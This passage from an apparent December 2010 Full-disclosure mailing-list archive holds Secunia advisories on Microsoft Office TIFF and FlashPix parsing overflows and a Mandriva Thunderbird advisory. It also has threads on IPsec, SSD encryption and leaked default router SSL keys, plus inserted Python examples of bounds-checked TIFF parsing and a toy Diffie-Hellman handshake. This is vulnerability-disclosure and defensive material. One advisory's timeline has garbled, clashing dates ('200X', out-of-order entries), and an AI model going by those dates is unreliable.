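        # Values longer than 4 bytes live at an offset; that range must lie
        # inside the file and past the header before it is trusted.
        if nbytes > 4 and (val < 8 or val + nbytes > len(data)):
            raise TiffError("tag %d data [%d, %d) outside file" % (tag, val, val + nbytes))
        entries.append((tag, typ, count, val))
    return entries


def is_well_formed(data):
    """Boolean wrapper around parse_ifd for filters and tests."""
    try:
        parse_ifd(data)
        return True
    except TiffError:
        return False


def build_tiff(bo, entries):
    """Constructed helper: assemble a header plus one IFD so the example
    runs offline. bo is "<" (II) or ">" (MM)."""
    out = (b"II" if bo == "<" else b"MM") + struct.pack(bo + "HI", 42, 8)
    out += struct.pack(bo + "H", len(entries))
    for tag, typ, count, val in entries:
        out += struct.pack(bo + "HHII", tag, typ, count, val)
    return out + struct.pack(bo + "I", 0)


# Constructed samples: a valid little- and big-endian file, and crafted ones.
GOOD_ENTRIES = [(256, 3, 1, 4), (257, 3, 1, 4)]          # ImageWidth/ImageLength = 4
LE_GOOD = build_tiff("<", GOOD_ENTRIES)
BE_GOOD = build_tiff(">", GOOD_ENTRIES)
BE_MARK_LE_BODY = b"MM" + LE_GOOD[2:]                    # byte-order mark lies about the body
OFFSET_PAST_EOF = build_tiff("<", [(270, 2, 100, 20)])   # 100-byte ASCII at offset 20
COUNT_OVERFLOW = build_tiff("<", [(273, 4, 0x40000000, 8)])  # count*4 exceeds 32 bits
TRUNCATED_IFD = LE_GOOD[:8] + struct.pack("<H", 200)     # claims 200 entries, has none

if __name__ == "__main__":
    print(parse_ifd(LE_GOOD), parse_ifd(BE_GOOD))
    for name in ("BE_MARK_LE_BODY", "OFFSET_PAST_EOF", "COUNT_OVERFLOW", "TRUNCATED_IFD"):
        print(name, is_well_formed(globals()[name]))
```

The two valid samples differ only in byte order and parse to the same entries; each crafted sample is rejected by a different check, which is the property a filter in front of a native converter wants before handing the file on.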

[Full-disclosure] Secunia Research: Microsoft Office Document Imaging Endian Conversion Vulnerability

2010-12-20 Thread Secunia Research
== 

 Secunia Research 14/12/2010

- Microsoft Office Document Imaging Endian Conversion Vulnerability -

== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

* Microsoft Office XP SP3
* Microsoft Office Converter Pack
* Microsoft Works 9

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

== 
3) Vendor's Description of Software 

Microsoft Office is a complete suite of productivity and database
software that will help you save time and stay organized.

Product Link:
http://office.microsoft.com/

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Office, 
which can be exploited by malicious people to potentially compromise a
user's system.

The vulnerability is caused by missing input validation within a 
library used by the bundled Microsoft Office Document Imaging 
application when converting certain data during parsing of TIFF 
images. This can be exploited to corrupt memory via a TIFF image 
containing specially crafted IFD entries.

Successful exploitation may allow execution of arbitrary code.

== 
5) Solution 

Apply patches provided by MS10-105.

== 
6) Time Table 

09/07/2009 - Vendor notified.
09/07/2009 - Vendor response.
25/09/2009 - Vendor provides status update.
30/04/2010 - Vendor provides status update (tentatively targeting 
 August 2010).
23/07/2010 - Vendor provides status update (slipped from August 2010 
 release and now scheduled for November 2010).
04/11/2010 - Vendor provides status update (slipped from November 2010
 release and now scheduled for December 2010).
08/11/2010 - Vendor informed that December is the final deadline.
14/12/2010 - Public disclosure.

== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-3950 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-31/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==



[Full-disclosure] Secunia Research: Microsoft Office TIFF Image Converter Two Buffer Overflows

2010-12-20 Thread Secunia Research
== 

 Secunia Research 14/12/2010

- Microsoft Office TIFF Image Converter Two Buffer Overflows -

== 
Table of Contents

Affected Software...........................1
Severity....................................2
Vendor's Description of Software............3
Description of Vulnerability................4
Solution....................................5
Time Table..................................6
Credits.....................................7
References..................................8
About Secunia...............................9
Verification...............................10

== 
1) Affected Software 

* Microsoft Office XP SP3
* Microsoft Office Converter Pack
* Microsoft Works 9

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

== 
3) Vendor's Description of Software 

Microsoft Office is a complete suite of productivity and database
software that will help you save time and stay organized.

Product Link:
http://office.microsoft.com/

== 
4) Description of Vulnerability

Secunia Research has discovered two vulnerabilities in Microsoft 
Office, which can be exploited by malicious people to compromise a 
user's system.

1) An input validation error in the TIFF Import/Export Graphic Filter
when copying certain data can be exploited to cause a heap-based 
buffer overflow via a specially crafted TIFF image.

2) Another input validation error in the TIFF Import/Export Graphic 
Filter when copying certain data after having encountered a specific 
error can be exploited to cause a heap-based buffer overflow via a 
specially crafted TIFF image.

Successful exploitation of the vulnerabilities may allow execution of 
arbitrary code when processing a TIFF image in an application using 
the graphics filter (e.g. opening the image in Microsoft Photo Editor
or importing it into an Office document).
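
The two TIFF advisories above (CVE-2010-3950, missing validation when converting IFD entry data, and CVE-2010-3947, unchecked copies in the TIFF graphics filter) describe what happens when a parser trusts offsets and counts read from the file. The following is an added example, not Secunia's, Microsoft's or any TIFF library's code: a small Python walker for the TIFF header and first IFD that validates the byte-order mark, the IFD offset, the entry count and every out-of-line value range against the file length before using them. MAX_ENTRIES is a sanity cap chosen for this example, and build_tiff constructs minimal in-memory files for exercising the checks.

```python
"""Bounds-checked walk of a TIFF header and its first IFD.

Added example (not Secunia's, Microsoft's or any TIFF library's code). It shows the
validation a parser needs before trusting offsets and counts read from the file,
which is the input validation the advisories above describe as missing.
"""
import struct

# Byte widths of the TIFF 6.0 field types (type code -> size).
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 6: 1, 7: 1, 8: 2, 9: 4, 10: 8, 11: 4, 12: 8}
MAX_ENTRIES = 4096  # constructed sanity cap for this example; TIFF itself allows 65535


class TiffError(ValueError):
    """Raised for any structural problem; the caller rejects the file instead of reading on."""


def parse_ifd0(data: bytes):
    """Return the entries of the first IFD as (tag, type, count, value_or_offset) tuples.

    Every offset and count is checked against len(data) before it is used, and the
    byte order is taken from the header so that II and MM files are converted alike.
    """
    if len(data) < 8:
        raise TiffError("file shorter than the 8-byte header")
    order = data[:2]
    if order == b"II":
        end = "<"  # little-endian file
    elif order == b"MM":
        end = ">"  # big-endian file
    else:
        raise TiffError("unknown byte-order mark %r" % order)
    magic, ifd_off = struct.unpack(end + "HI", data[2:8])
    if magic != 42:
        raise TiffError("bad magic %d" % magic)
    # The IFD must start inside the file and leave room for its 2-byte entry count.
    if ifd_off < 8 or ifd_off + 2 > len(data):
        raise TiffError("IFD offset %d outside %d-byte file" % (ifd_off, len(data)))
    (n,) = struct.unpack(end + "H", data[ifd_off:ifd_off + 2])
    if n == 0 or n > MAX_ENTRIES:
        raise TiffError("implausible entry count %d" % n)
    # n 12-byte entries plus the 4-byte next-IFD pointer must fit in the file.
    if ifd_off + 2 + n * 12 + 4 > len(data):
        raise TiffError("IFD with %d entries runs past end of file" % n)
    entries = []
    pos = ifd_off + 2
    for _ in range(n):
        tag, typ, count, value = struct.unpack(end + "HHII", data[pos:pos + 12])
        pos += 12
        size = TYPE_SIZES.get(typ)
        if size is None:
            raise TiffError("tag %d has unknown field type %d" % (tag, typ))
        # Python ints cannot overflow; in C the product count*size must itself be checked.
        total = count * size
        # Values wider than 4 bytes live out of line at 'value'; that range must be in the file.
        if total > 4 and value + total > len(data):
            raise TiffError("tag %d: %d bytes at offset %d exceed file" % (tag, total, value))
        entries.append((tag, typ, count, value))
    return entries


def is_well_formed(data: bytes) -> bool:
    """True if the header and first IFD pass every check above."""
    try:
        parse_ifd0(data)
        return True
    except TiffError:
        return False


def build_tiff(order: str, entries) -> bytes:
    """Construct a minimal in-memory TIFF (a constructed sample, not a real image).

    order is "II" or "MM"; entries are (tag, type, count, value_or_offset) tuples.
    """
    end = "<" if order == "II" else ">"
    out = bytearray(order.encode() + struct.pack(end + "HI", 42, 8))
    out += struct.pack(end + "H", len(entries))
    for tag, typ, count, value in entries:
        out += struct.pack(end + "HHII", tag, typ, count, value)
    out += struct.pack(end + "I", 0)  # no next IFD
    return bytes(out)


def with_ifd_offset(data: bytes, ifd_off: int) -> bytes:
    """Copy of a TIFF with the header's IFD offset rewritten, for building malformed inputs."""
    end = "<" if data[:2] == b"II" else ">"
    return data[:4] + struct.pack(end + "I", ifd_off) + data[8:]
```

The checks are deliberately ordered so that each value is validated before the next read depends on it: the IFD offset before the entry count, the entry count before the entry table, and the per-entry type and count before any out-of-line value would be touched. In C the same logic also needs an overflow check on count * size and on the offset additions, which Python's unbounded integers hide.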

== 
5) Solution 

Apply patches provided by MS10-105.

== 
6) Time Table 

07/07/2010 - Vendor notified about vulnerability #1.
08/07/2010 - Vendor notified about vulnerability #2.
08/07/2010 - Vendor response.
15/08/2010 - Vendor provides status update.
11/01/2010 - Status update requested.
11/01/2010 - Vendor provides status update (tentatively targeting 
 May 2010).
30/04/2010 - Vendor provides status update (slipped from May 2010 
 release and now tentatively targeting August 2010).
23/07/2010 - Vendor provides status update (slipped from August 2010 
 release and now scheduled for November 2010).
04/11/2010 - Vendor provides status update (slipped from November 2010
 release and now scheduled for December 2010).
08/11/2010 - Vendor informed that December is the final deadline.
14/12/200X - Public disclosure.

== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-3947 for the vulnerabilities.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/


Re: [Full-disclosure] adobe.com important subdomain SQL injection again!

2010-12-20 Thread Marsh Ray
On 12/19/2010 09:32 PM, John Jester wrote:

 Sandboxing the plug-in from your system fixes it I believe. It's so
 futile sandboxing it was key.

OK, so if sandboxing works, then why not just let devs build x86/x64 
code in the first place? In the same category as Native Client or ActiveX.

Maybe because sandboxing isn't going to work so well?

 And security, hell a multi-billion dollar company can't keep it from
 gobbling up 100% cpu in some instances. Huge note: over the years has
 been massive improvement in both performance and security.

I wonder how much of that is the game or app itself in a tight loop. CPU 
is, after all, there to be used.

 It's not hopeless or futile, but come on, it's like the titanic.

Remember chapter 1 of the textbook when it said "The first rule of 
security is never try to retrofit security, _ever_!!" and underlined it 
three times?

Well see back in 1996 there were these really popular animation and 
multimedia CD-ROM authoring packages and... the rest is history.

- Marsh



[Full-disclosure] [ MDVSA-2010:258 ] mozilla-thunderbird

2010-12-20 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:258
 http://www.mandriva.com/security/
 ___

 Package : mozilla-thunderbird
 Date: December 20, 2010
 Affected: 2009.0, 2010.0, 2010.1
 ___

 Problem Description:

 Security issues were identified and fixed in mozilla-thunderbird:
 
 Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, Thunderbird
 before 3.0.11 and 3.1.x before 3.1.7, and SeaMonkey before 2.0.11 do
 not properly validate downloadable fonts before use within an operating
 system's font implementation, which allows remote attackers to execute
 arbitrary code via vectors related to @font-face Cascading Style Sheets
 (CSS) rules (CVE-2010-3768).
 
 The line-breaking implementation in Mozilla Firefox before 3.5.16 and
 3.6.x before 3.6.13, Thunderbird before 3.0.11 and 3.1.x before 3.1.7,
 and SeaMonkey before 2.0.11 on Windows does not properly handle long
 strings, which allows remote attackers to execute arbitrary code
 via a crafted document.write call that triggers a buffer over-read
 (CVE-2010-3769).
 
 Multiple unspecified vulnerabilities in the browser engine in Mozilla
 Firefox before 3.5.16 and 3.6.x before 3.6.13, Thunderbird before
 3.0.11 and 3.1.x before 3.1.7, and SeaMonkey before 2.0.11 allow
 remote attackers to cause a denial of service (memory corruption and
 application crash) or possibly execute arbitrary code via unknown
 vectors (CVE-2010-3776).
 
 Unspecified vulnerability in Mozilla Firefox 3.6.x before 3.6.13
 and Thunderbird 3.1.x before 3.1.7 allows remote attackers to cause
 a denial of service (memory corruption and application crash) or
 possibly execute arbitrary code via unknown vectors (CVE-2010-3777).
 
 Unspecified vulnerability in Mozilla Firefox 3.5.x before 3.5.16,
 Thunderbird before 3.0.11, and SeaMonkey before 2.0.11 allows
 remote attackers to cause a denial of service (memory corruption and
 application crash) or possibly execute arbitrary code via unknown
 vectors (CVE-2010-3778).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149products_id=490
 
 Additionally, some packages which require so, have been rebuilt and
 are being provided as updates.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3768
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3769
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3776
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3777
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3778
 http://www.mozillamessaging.com/en-US/thunderbird/3.0.11/releasenotes/
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 fccf9646188072751f5a7ccd5ea99093  
2009.0/i586/beagle-0.3.8-13.32mdv2009.0.i586.rpm
 2ab2f2d5f07340d31d46b7da22d6824a  
2009.0/i586/beagle-crawl-system-0.3.8-13.32mdv2009.0.i586.rpm
 452bd02a8bd7b9f0b2f8f13d18a79d2f  
2009.0/i586/beagle-doc-0.3.8-13.32mdv2009.0.i586.rpm
 9b263f22ed4040de8ef18856fa0f0151  
2009.0/i586/beagle-epiphany-0.3.8-13.32mdv2009.0.i586.rpm
 28be09dd956921130ac65818af4e0a0f  
2009.0/i586/beagle-evolution-0.3.8-13.32mdv2009.0.i586.rpm
 e95d2331b9e62152541519cdd621d8b3  
2009.0/i586/beagle-gui-0.3.8-13.32mdv2009.0.i586.rpm
 5ae981d91836b97b032f15c211c8e6c6  
2009.0/i586/beagle-gui-qt-0.3.8-13.32mdv2009.0.i586.rpm
 ae3d0e076da43c7c3b223de2b6dbe22a  
2009.0/i586/beagle-libs-0.3.8-13.32mdv2009.0.i586.rpm
 6e2ea10ff7e5235d68da215da7500ed9  
2009.0/i586/firefox-ext-beagle-0.3.8-13.32mdv2009.0.i586.rpm
 61abe671a3bd7f78423848a2626e9ada  
2009.0/i586/mozilla-thunderbird-3.0.11-0.1mdv2009.0.i586.rpm
 d90d86f0cefe498d1b09a21d735f889d  
2009.0/i586/mozilla-thunderbird-af-3.0.11-0.1mdv2009.0.i586.rpm
 bce9b6f6fea37fa61eff2123bac0464d  
2009.0/i586/mozilla-thunderbird-ar-3.0.11-0.1mdv2009.0.i586.rpm
 7b79aaffdeecdc6edd23b80a401ac42b  
2009.0/i586/mozilla-thunderbird-be-3.0.11-0.1mdv2009.0.i586.rpm
 5fb5a6b7863f8aec936a50ee786d4b09  
2009.0/i586/mozilla-thunderbird-beagle-0.3.8-13.32mdv2009.0.i586.rpm
 a5ac95da0aab8dd3d6ea867ebc2b4fdb  
2009.0/i586/mozilla-thunderbird-bg-3.0.11-0.1mdv2009.0.i586.rpm
 cfdd03115c4024a0853f75cc52a30ce0  
2009.0/i586/mozilla-thunderbird-ca-3.0.11-0.1mdv2009.0.i586.rpm
 3cdc6f771f3ae26d0934aa8285bc27bb  
2009.0/i586/mozilla-thunderbird-cs-3.0.11-0.1mdv2009.0.i586.rpm
 197b432492db1c2898801722b229d5f6  
2009.0/i586/mozilla-thunderbird-da-3.0.11-0.1mdv2009.0.i586.rpm
 90535588713215b8a9bc1b0adfcef6b4  
2009.0/i586/mozilla-thunderbird-de-3.0.11-0.1mdv2009.0.i586.rpm
 7351b093d8adf1ecba3d721dd7e1ab03  

Re: [Full-disclosure] OpenBSD Paradox

2010-12-20 Thread coderman
On Wed, Dec 15, 2010 at 12:22 PM, Theo de Raadt dera...@cvs.openbsd.org wrote:
 ... IPSEC isn't 100% crypto;

IPsec hasn't been IPSEC since rfc4301 or so...

/pedant



Re: [Full-disclosure] Default SSL Keys in Multiple Routers

2010-12-20 Thread BMF
On Sat, Dec 18, 2010 at 7:13 PM, Craig Heffner cheff...@devttys0.com wrote:
 The LittleBlackBox project contains a database of over 2,000 (and growing)
 private SSL keys that are correlated with their respective public
 certificates, and hardware/firmware versions. While most of these
 certificates are from DD-WRT firmware, there are also private keys from
 other vendors including Cisco, Linksys, D-Link and Netgear.

Most of what I have read so far indicates that these secret keys can
be used to sniff only administrative traffic to the device itself.

I have a client who uses a bunch of WRV200's for corp VPN access. They
are configured with a shared secret. Wouldn't they use DH with the
built in private key to exchange the shared secret which would make
the VPN traffic itself vulnerable?

Looks like you have the 210 but not the 200 but I bet your tool could
pull out the key for wrv200.

BMF



Re: [Full-disclosure] OpenBSD Paradox

2010-12-20 Thread Marsh Ray
On 12/20/2010 05:02 PM, coderman wrote:
 On Wed, Dec 15, 2010 at 12:22 PM, Theo de Raadtdera...@cvs.openbsd.org  
 wrote:
 ... IPSEC isn't 100% crypto;

 IPsec hasn't been IPSEC since rfc4301 or so...

 /pedant

Well that's the proof of the backdoor then!

Everyone knows TOP SECRET GOVERNMENT COMPUTERS USE ONLY UPPERCASE 
LETTERS. They also make that cool bp-bp sound as they print out 
embassy cables at 300 bps.

But actually, RFC 4301 (ahem, please watch your capitalization) says:
  The spelling IPsec is preferred and used throughout this and all
related IPsec standards.  All other capitalizations of IPsec (e.g.,
IPSEC, IPSec, ipsec) are deprecated.  However, any capitalization of
the sequence of letters IPsec should be understood to refer to the
IPsec protocols.

- Marsh



Re: [Full-disclosure] SSD and WDE

2010-12-20 Thread coderman
On Fri, Dec 17, 2010 at 3:16 PM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:
 ... anyone aware of any academic or technical
 studies of whole disk encryption for solid state discs.

what kind of details are you looking for?

solid state and full disk encryption are a match made in heaven. the
rest is just details... *grin*

SLC over MLC and pair with on die accelerated AES. as with disk based,
encryption renders all reads and writes effectively randomized. SSD
removes seek hit but you have still invalidated read-ahead caching and
other common optimizations.

update firmware as nearly all devices have undergone wear-leveling, hw
driver, and other fixes post launch.

regarding wear leveling, FDE means never having to worry about secure
delete, which may not be possible with  reasonable effort on MLC SSD
storage.

SSD make fine complement to hybrid storage; small fast SLC first tier
backed by platters for extended duration and volume. key management of
hybrid / multi LVM encrypted systems too long a tale to discuss here.
but also not unique to SSD.

hardware-based FDE is also just as applicable to SSD as other media.
invoking CDE on demand a useful convenience. but also not unique to
SSD.

aside from MLC algorithm specific difficulties of data remanence all
the usual disclaimers on zeroisation and key management apply,
including secure mode of operation.
this also not unique to SSD.
;)



Re: [Full-disclosure] OpenBSD Paradox

2010-12-20 Thread coderman
On Mon, Dec 20, 2010 at 4:20 PM, Marsh Ray ma...@extendedsubset.com wrote:
 ...
 RFC 4301 (ahem, please watch your capitalization) says:

  The spelling IPsec is preferred and used throughout this and all
   related IPsec standards.  All other capitalizations of IPsec (e.g.,
   IPSEC, IPSec, ipsec) are deprecated.  However, any capitalization of
   the sequence of letters IPsec should be understood to refer to the
   IPsec protocols.


iPsEc makes me sad in stack.

REGARDING PROOF; I CONCUR. OCCAM OVER.



Re: [Full-disclosure] Default SSL Keys in Multiple Routers

2010-12-20 Thread coderman
On Mon, Dec 20, 2010 at 4:04 PM, BMF badmotherfs...@gmail.com wrote:
...
 Most of what I have read so far indicates that these secret keys can
 be used to sniff only administrative traffic to the device itself.

right. considering 97.3% of these devices have trivial XSRF, remote
access, and other vectors wide open this (active MitM to HTTPS admin
panel on home localnet?) is the least of your concerns.


 I have a client who uses a bunch of WRV200's for corp VPN access. They
 are configured with a shared secret. Wouldn't they use DH with the
 built in private key to exchange the shared secret which would make
 the VPN traffic itself vulnerable?

this is ambiguous. what kind of VPN? are you keying ISAKMP daemon with
a shared secret or is manual pre-shared key what you're describing?
very different levels of privacy and forward secrecy respectively.

see IPSecVPN chapter, specifically Auto (IKE) key exchange method,
AES ISAKMP Encryption Method, SHA ISAKMP Authentication Method, 2048
or 4096 ISAKMP DH Group, PFS Enabled, AES IPSec Encryption Method, SHA
IPSec Authentication Method, Pre-shared Key for ISAKMP authentication
in manual.



Re: [Full-disclosure] Default SSL Keys in Multiple Routers

2010-12-20 Thread Jeffrey Walton
On Mon, Dec 20, 2010 at 7:04 PM, BMF badmotherfs...@gmail.com wrote:
 On Sat, Dec 18, 2010 at 7:13 PM, Craig Heffner cheff...@devttys0.com wrote:
 The LittleBlackBox project contains a database of over 2,000 (and growing)
 private SSL keys that are correlated with their respective public
 certificates, and hardware/firmware versions. While most of these
 certificates are from DD-WRT firmware, there are also private keys from
 other vendors including Cisco, Linksys, D-Link and Netgear.

 Most of what I have read so far indicates that these secret keys can
 be used to sniff only administrative traffic to the device itself.

 I have a client who uses a bunch of WRV200's for corp VPN access. They
 are configured with a shared secret. Wouldn't they use DH with the
 built in private key to exchange the shared secret which would make
 the VPN traffic itself vulnerable?

When using DH for the exchange of the random values, the random value
is raised to the group base, i.e., g^a (or g^b) where 'a' is one side's
random {16|32|x} bytes. The private key would be used to sign the
messages used in the exchange of the material. This scheme is referred
to as Ephemeral Diffie-Hellman or DH2.

An intermediate with knowledge of a private key could play the role of
man in the middle since he/she could forge a signature. So the
security properties of the signature over the exchange would be
destroyed, and the system would be no more secure than standard DH.
And standard DH is vulnerable to MITM.

If the attacker is passive and cannot intercept the messages or assume
the role of MITM, then the confidentiality of messages is probably
safe. The bad guy would probably not be able to inject messages since,
for bulk encryption (i.e., after key exchange), the protocol would
switch to an HMAC rather than digital signatures. But I would not feel
good knowing a private key used for signing was in the hands of a
[malicious?] third party.

Jeff
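
BMF's question (whether the router's built-in private key is what protects the VPN's shared secret) and the two replies from coderman and Jeff both turn on how the exchange is keyed: an ISAKMP daemon keyed with a pre-shared key runs an ephemeral Diffie-Hellman exchange and uses the secret only to authenticate it, whereas manual keying uses the configured secret as the traffic key itself. The following is an added example, not code from any poster or vendor: a Python simulation of both peers of such an exchange, with static manual keying beside it for contrast. The group parameters, the key derivation and the authenticator layout are toy constructions for illustration and do not follow the RFC 2409 formats.

```python
"""IKE-style key exchange simulated in one process: ephemeral Diffie-Hellman for the
session key, a pre-shared key (PSK) only to authenticate the exchange.

Added example, not any poster's or vendor's code. The group, the key derivation and the
authenticator layout are toy constructions for illustration, not the RFC 2409 formats.
"""
import hashlib
import hmac
import secrets

# Toy group (constructed): the Mersenne prime 2^127-1 with generator 2. Real deployments
# use a standard MODP group such as the 2048-bit DH group mentioned in the thread.
P = (1 << 127) - 1
G = 2


def dh_keypair():
    """Fresh ephemeral exponent and its public value g^a mod p for one session."""
    a = secrets.randbelow(P - 2) + 1
    return a, pow(G, a, P)


def derive_session_key(shared: int, nonce_i: bytes, nonce_r: bytes) -> bytes:
    """SKEYID-like derivation from the DH result and both nonces; the PSK is not an input."""
    return hashlib.sha256(shared.to_bytes(16, "big") + nonce_i + nonce_r).digest()


def auth_tag(psk: bytes, pub_i: int, pub_r: int, nonce_i: bytes, nonce_r: bytes,
             role: bytes) -> bytes:
    """Authenticator: HMAC keyed by the PSK over the transcript of public values.

    Anyone can see the transcript, but only a holder of the PSK can produce or check
    this tag, which is what binds the ephemeral values to the two peers.
    """
    msg = role + pub_i.to_bytes(16, "big") + pub_r.to_bytes(16, "big") + nonce_i + nonce_r
    return hmac.new(psk, msg, hashlib.sha256).digest()


def handshake(psk_initiator: bytes, psk_responder: bytes):
    """Run both peers. Returns (authenticated, key_at_initiator, key_at_responder)."""
    a, pub_i = dh_keypair()
    nonce_i = secrets.token_bytes(16)
    b, pub_r = dh_keypair()
    nonce_r = secrets.token_bytes(16)
    # Each side combines its own exponent with the peer's public value.
    key_i = derive_session_key(pow(pub_r, a, P), nonce_i, nonce_r)
    key_r = derive_session_key(pow(pub_i, b, P), nonce_i, nonce_r)
    # Each side sends a tag under its PSK; the peer recomputes it under its own PSK.
    tag_i = auth_tag(psk_initiator, pub_i, pub_r, nonce_i, nonce_r, b"I")
    tag_r = auth_tag(psk_responder, pub_i, pub_r, nonce_i, nonce_r, b"R")
    ok_r = hmac.compare_digest(tag_i, auth_tag(psk_responder, pub_i, pub_r, nonce_i, nonce_r, b"I"))
    ok_i = hmac.compare_digest(tag_r, auth_tag(psk_initiator, pub_i, pub_r, nonce_i, nonce_r, b"R"))
    return ok_i and ok_r, key_i, key_r


def manual_keying_key(psk: bytes) -> bytes:
    """Contrast: with manual keying the traffic key is a fixed function of the configured
    secret, so every session reuses it and a leaked secret exposes all recorded traffic.
    No ephemeral values are involved."""
    return hashlib.sha256(b"manual-key" + psk).digest()
```

Running handshake twice with the same PSK gives two different session keys, because the exponents are ephemeral and the PSK never enters the key derivation: a recorded transcript plus a later-leaked long-term secret does not yield g^ab, which is the passive-observer case Jeff describes. What the long-term secret protects is the authentication, so a peer that loses it should rotate it and re-establish sessions; manual_keying_key shows the contrasting configuration in which the secret is the traffic key and there is nothing ephemeral to fall back on.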



[Full-disclosure] Secunia Research: Microsoft Office FlashPix Property Set Parsing Buffer Overflow

2010-12-20 Thread Secunia Research
== 

 Secunia Research 14/12/2010

  - Microsoft Office FlashPix Property Set Parsing Buffer Overflow -

== 
Table of Contents

Affected Software...........................1
Severity....................................2
Vendor's Description of Software............3
Description of Vulnerability................4
Solution....................................5
Time Table..................................6
Credits.....................................7
References..................................8
About Secunia...............................9
Verification...............................10

== 
1) Affected Software 

* Microsoft Office XP SP3
* Microsoft Office Converter Pack

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Moderately critical
Impact: System access
Where:  From remote

== 
3) Vendor's Description of Software 

Microsoft Office is a complete suite of productivity and database
software that will help you save time and stay organized.

Product Link:
http://office.microsoft.com/

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Office, 
which can be exploited by malicious people to compromise a user's 
system.

The vulnerability is caused by a boundary error in the FlashPix 
graphics filter when parsing certain property sets. This can be 
exploited to cause a stack-based buffer overflow via a specially 
crafted FlashPix image.

Successful exploitation allows execution of arbitrary code.

== 
5) Solution 

Apply patches provided by MS10-105.

== 
6) Time Table 

27/07/2009 - Vendor notified.
27/07/2009 - Vendor response.
19/08/2009 - Vendor provides status update.
24/09/2009 - Vendor provides status update.
27/10/2009 - Vendor provides status update.
08/12/2009 - Vendor provides status update.
29/01/2010 - Vendor provides status update.
30/04/2010 - Vendor provides status update (tentatively targeting 
 August 2010).
23/07/2010 - Vendor provides status update (slipped from August 2010 
 release and now scheduled for November 2010).
04/11/2010 - Vendor provides status update (slipped from November 2010
 release and now scheduled for December 2010).
08/11/2010 - Vendor informed that December is the final deadline.
14/12/2010 - Public disclosure.

== 
7) Credits 

Discovered by Dyon Balding, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-3951 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-33/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


[Full-disclosure] Secunia Research: Microsoft Office FlashPix Tile Data Two Buffer Overflows

2010-12-20 Thread Secunia Research
== 

 Secunia Research 14/12/2010

 - Microsoft Office Two FlashPix Tile Data Buffer Overflows -

== 
Table of Contents

Affected Software...........................1
Severity....................................2
Vendor's Description of Software............3
Description of Vulnerability................4
Solution....................................5
Time Table..................................6
Credits.....................................7
References...................................8
About Secunia...............................9
Verification...............................10

== 
1) Affected Software 

* Microsoft Office XP SP3
* Microsoft Office Converter Pack

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Moderately critical
Impact: System access
Where:  From remote

== 
3) Vendor's Description of Software 

To convert documents to and from different formats or to insert
graphics, you must install the appropriate text converters or graphics
filters included with the Microsoft Office 2000 Setup or the Microsoft
Office Converter Pack.

Product Link:
http://office.microsoft.org/

== 
4) Description of Vulnerability

